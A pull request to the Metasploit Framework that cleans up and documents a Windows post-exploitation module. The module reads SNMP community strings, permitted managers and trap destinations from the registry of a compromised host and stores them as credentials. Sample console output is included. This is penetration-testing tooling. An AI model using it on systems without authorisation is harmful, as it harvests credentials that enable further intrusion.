### PR TITLE
enum_snmp: Cleanup and support non-Meterpreter sessions

### DIFF
--- a/documentation/modules/post/windows/gather/enum_snmp.md
+++ b/documentation/modules/post/windows/gather/enum_snmp.md
@@ -1,0 +1,45 @@
+## Vulnerable Application
+
+This module will enumerate the SNMP service configuration.
+
+## Verification Steps
+
+1. Start msfconsole
+2. Get a session
+3. Do: `use post/windows/gather/enum_snmp`
+4. Do: `set SESSION <session id>`
+5. Do: `run`
+
+## Options
+
+## Scenarios
+
+### Windows Server 2008 (x64)
+
+```
+msf6 > use post/windows/gather/enum_snmp
+msf6 post(windows/gather/enum_snmp) > set session 1
+session => 1
+msf6 post(windows/gather/enum_snmp) > run
+
+[*] Running module against WIN-17B09RRRJTG (192.168.200.218)
+[*] Checking if SNMP service is installed
+[*] 	SNMP is installed!
+[*] Enumerating community strings
+[*] 
+[*] 	Community Strings
+[*] 	=================
+[*] 	
+[*] 	 Name    Type
+[*] 	 ----    ----
+[*] 	 secret  READ & WRITE
+[*] 	 test    READ ONLY
+[*] 
+[*] Enumerating Permitted Managers for Community Strings
+[*] 	SNMP packets are accepted from any host
+[*] Enumerating Trap configuration
+[*] Community Name: test
+[*] 	Destination: 127.0.0.1
+[*] 	Destination: snmp.local
+[*] Post module execution completed
+```

--- a/modules/post/windows/gather/enum_snmp.rb
+++ b/modules/post/windows/gather/enum_snmp.rb
@@ -3,142 +3,186 @@
 # Current source: https://github.com/rapid7/metasploit-framework
 ##
 
-
 class MetasploitModule < Msf::Post
   include Msf::Post::Windows::Registry
   include Msf::Auxiliary::Report
 
-  def initialize(info={})
-    super( update_info( info,
-        'Name'          => 'Windows Gather SNMP Settings Enumeration (Registry)',
-        'Description'   => %q{ This module will enumerate the SNMP service configuration },
-        'License'       => MSF_LICENSE,
-        'Author'        => [ 'Carlos Perez <carlos_perez[at]darkoperator.com>', 'Tebo <tebo[at]attackresearch.com>'],
-        'Platform'      => [ 'win' ],
-        'SessionTypes'  => [ 'meterpreter' ]
-      ))
+  def initialize(info = {})
+    super(
+      update_info(
+        info,
+        'Name' => 'Windows Gather SNMP Settings',
+        'Description' => %q{ This module will enumerate the SNMP service configuration. },
+        'License' => MSF_LICENSE,
+        'Author' => [
+          'Carlos Perez <carlos_perez[at]darkoperator.com>',
+          'Tebo <tebo[at]attackresearch.com>'
+        ],
+        'References' => [
+          ['MSB', 'MS00-096'],
+          ['URL', 'https://docs.microsoft.com/en-us/security-updates/securitybulletins/2000/ms00-096'],
+        ],
+        'Platform' => [ 'win' ],
+        'SessionTypes' => %w[shell powershell meterpreter],
+        'Notes' => {
+          'Stability' => [CRASH_SAFE],
+          'Reliability' => [],
+          'SideEffects' => []
+        }
+      )
+    )
   end
 
-  # Run Method called when command run is issued
   def run
-    print_status("Running module against #{sysinfo['Computer']}")
-    if check_snmp
-      community_strings
-      trap_setup
+    hostname = sysinfo.nil? ? cmd_exec('hostname') : sysinfo['Computer']
+    print_status("Running module against #{hostname} (#{session.session_host})")
+
+    unless snmp_installed?
+      print_error("\tSNMP service is not installed on the target host")
+      return
     end
+
+    print_status("\tSNMP is installed!")
+
+    community_strings
+    snmp_permitted_managers
+    trap_configuration
   end
 
-  # Method for Checking if SNMP is installed on the target host
-  def check_snmp
-    print_status("Checking if SNMP is Installed")
-    key = "HKLM\\System\\CurrentControlSet\\Services"
-    if registry_enumkeys(key).include?("SNMP")
-      print_status("\tSNMP is installed!")
-      return true
-    else
-      print_error("\tSNMP is not installed on the target host")
-      return false
-    end
+  # Check if SNMP is installed on the target host
+  #
+  # @return [Boolean] True if the SNMP service is installed
+  def snmp_installed?
+    print_status('Checking if SNMP service is installed')
+    registry_enumkeys('HKLM\\System\\CurrentControlSet\\Services').include?('SNMP')
   end
 
-  # Method for enumerating the Community Strings configured
+  # Enumerate configured Community Strings
   def community_strings
-    comm_str = []
+    print_status('Enumerating community strings')
+    key = 'HKLM\\System\\CurrentControlSet\\Services\\SNMP\\Parameters\\ValidCommunities'
+
+    unless registry_key_exist?(key)
+      print_error("\tInsufficient privileges to retrieve Community Strings or none configured")
+      return
+    end
+
+    comm_strings = registry_enumvals(key)
+
+    if comm_strings.blank?
+      print_status("\tNo Community strings configured")
+      return
+    end
+
     tbl = Rex::Text::Table.new(
-      'Header'  => "Community Strings",
-      'Indent'  => 1,
+      'Header' => 'Community Strings',
+      'Indent' => 1,
       'Columns' =>
       [
-        "Name",
-        "Type"
-      ])
-    print_status("Enumerating community strings")
-    key = "HKLM\\System\\CurrentControlSet\\Services\\SNMP\\Parameters\\ValidCommunities"
-    comm_str = registry_enumvals(key)
-    if not comm_str.nil? and not comm_str.empty?
-      comm_str.each do |c|
+        'Name',
+        'Type'
+      ]
+    )
 
-        # comm_type is for human display, access_type is passed to the credential
-        # code using labels consistent with the SNMP login scanner
-        case registry_getvaldata(key,c)
-        when 4
-          comm_type = 'READ ONLY'
-          access_type = 'read-only'
-        when 1
-          comm_type = 'DISABLED'
-          access_type = 'disabled'
-        when 2
-          comm_type = 'NOTIFY'
-          access_type = 'notify'
-        when 8
-          comm_type = 'READ & WRITE'
-          access_type = 'read-write'
-        when 16
-          comm_type = 'READ CREATE'
-          access_type = 'read-create'
-        end
+    comm_strings.each do |c|
+      # comm_type is for human display, access_type is passed to the credential
+      # code using labels consistent with the SNMP login scanner
+      type = registry_getvaldata(key, c)
 
-        # Save data to table
-        tbl << [c,comm_type]
-
-        register_creds(session.session_host, 161, '', c, 'snmp', access_type)
+      case (type.to_s.starts_with?('0x') ? type.to_i(16) : type.to_i)
+      when 4
+        comm_type = 'READ ONLY'
+        access_type = 'read-only'
+      when 1
+        comm_type = 'DISABLED'
+        access_type = 'disabled'
+      when 2
+        comm_type = 'NOTIFY'
+        access_type = 'notify'
+      when 8
+        comm_type = 'READ & WRITE'
+        access_type = 'read-write'
+      when 16
+        comm_type = 'READ CREATE'
+        access_type = 'read-create'
+      else
+        print_warning("Unknown access type for '#{c}' : #{type}")
+        comm_type = 'UNKNOWN'
+        access_type = ''
       end
-      print_status("")
 
-      # Print table
-      tbl.to_s.each_line do |l|
-        print_status("\t#{l.chomp}")
-      end
-      print_status("")
+      tbl << [c, comm_type]
 
-      # Check who can connect using the Community Strings
-      allowd_for_snmp_query
-
-    else
-      print_error("\tNo Community strings configured")
-
+      register_creds(session.session_host, 161, '', c, 'snmp', access_type)
     end
+    print_status
+
+    tbl.to_s.each_line do |l|
+      print_status("\t#{l.chomp}")
+    end
+    print_status
+
+    true
   end
 
-  # Method for enumerating the Traps configured
-  def trap_setup
-    print_status("Enumerating Trap Configuration")
-    key = "HKLM\\System\\CurrentControlSet\\Services\\SNMP\\Parameters\\TrapConfiguration"
+  # Enumerate configured SNMP Traps
+  def trap_configuration
+    print_status('Enumerating Trap configuration')
+
+    key = 'HKLM\\System\\CurrentControlSet\\Services\\SNMP\\Parameters\\TrapConfiguration'
+
+    unless registry_key_exist?(key)
+      print_error("\tInsufficient privileges to retrieve SNMP Traps or none configured")
+      return
+    end
+
     trap_hosts = registry_enumkeys(key)
-    if not trap_hosts.nil? and not trap_hosts.empty?
-      trap_hosts.each do |c|
-        print_status("Community Name: #{c}")
 
-        t_comm_key = key+"\\"+c
-        registry_enumvals(t_comm_key).each do |t|
-          trap_dest = registry_getvaldata(t_comm_key,t)
-          print_status("\tDestination: #{trap_dest}")
-          register_creds(trap_dest, 162, '', c, 'snmptrap', 'trap')
-        end
+    if trap_hosts.blank?
+      print_status("\tNo Traps are configured")
+      return
+    end
+
+    trap_hosts.each do |c|
+      print_status("Community Name: #{c}")
+
+      t_comm_key = key + '\\' + c
+      destinations = registry_enumvals(t_comm_key)
+      next if destinations.blank?
+
+      destinations.each do |t|
+        trap_dest = registry_getvaldata(t_comm_key, t)
+        print_status("\tDestination: #{trap_dest}")
+        register_creds(trap_dest, 162, '', c, 'snmptrap', 'trap')
       end
-    else
-      print_status("No Traps are configured")
     end
   end
 
-  # Method for enumerating Permitted Managers
-  def allowd_for_snmp_query
-    print_status("Enumerating Permitted Managers for Community Strings")
-    key = "HKLM\\System\\CurrentControlSet\\Services\\SNMP\\Parameters\\PermittedManagers"
-    managers = registry_enumvals(key)
-    if not managers.nil? and not managers.empty?
-      print_status("Community Strings can be accessed from:")
-      managers.each do |m|
-        print_status("\t#{registry_getvaldata(key,m)}")
-      end
+  # Enumerate Permitted Managers
+  # Check which hosts can connect using the Community Strings
+  def snmp_permitted_managers
+    print_status('Enumerating Permitted Managers for Community Strings')
+    key = 'HKLM\\System\\CurrentControlSet\\Services\\SNMP\\Parameters\\PermittedManagers'
 
-    else
-      print_status("\tCommunity Strings can be accessed from any host")
+    unless registry_key_exist?(key)
+      print_error("\tInsufficient privileges to retrieve Permitted Managers or none configured")
+      return
+    end
+
+    managers = registry_enumvals(key)
+
+    if managers.blank?
+      print_status("\tSNMP packets are accepted from any host")
+      return
+    end
+
+    print_status('SNMP packets are accepted from:')
+    managers.each do |m|
+      print_status("\t#{registry_getvaldata(key, m)}")
     end
   end
 
   def register_creds(client_ip, client_port, user, pass, service_name, access_type)
-    # Build service information
     service_data = {
       address: client_ip,
       port: client_port,
@@ -147,12 +191,11 @@ class MetasploitModule < Msf::Post
       workspace_id: myworkspace_id
     }
 
-    # Build credential information
     credential_data = {
       access_level: access_type,
       origin_type: :session,
       session_id: session_db_id,
-      post_reference_name: self.refname,
+      post_reference_name: refname,
       private_data: pass,
       private_type: :password,
       username: user,
@@ -162,7 +205,6 @@ class MetasploitModule < Msf::Post
     credential_data.merge!(service_data)
     credential_core = create_credential(credential_data)
 
-    # Assemble the options hash for creating the Metasploit::Credential::Login object
     login_data = {
       core: credential_core,
       status: Metasploit::Model::Login::Status::UNTRIED,


### PR DESCRIPTION
Resolves Rubocop violations.

Adds documentation.

Adds references.

Adds `Notes` module meta information.

Adds support for non-Meterpreter sessions. (Note: tested on shell sessions. Not tested with PowerShell, but the Post APIs used by this module should should work with PowerShell)

Improves error handling, the lack of which warrants the `bug` label. Previously, on modern Windows (after Windows 2000), for low-privileged sessions, the module would fail to retrieve the Community Strings and Permitted Managers, falsely claiming that they didn't exist. This was wrong. They exist, but require elevated privileges to view. This has been resolved by checking first whether the key exists with `registry_key_exist?`.
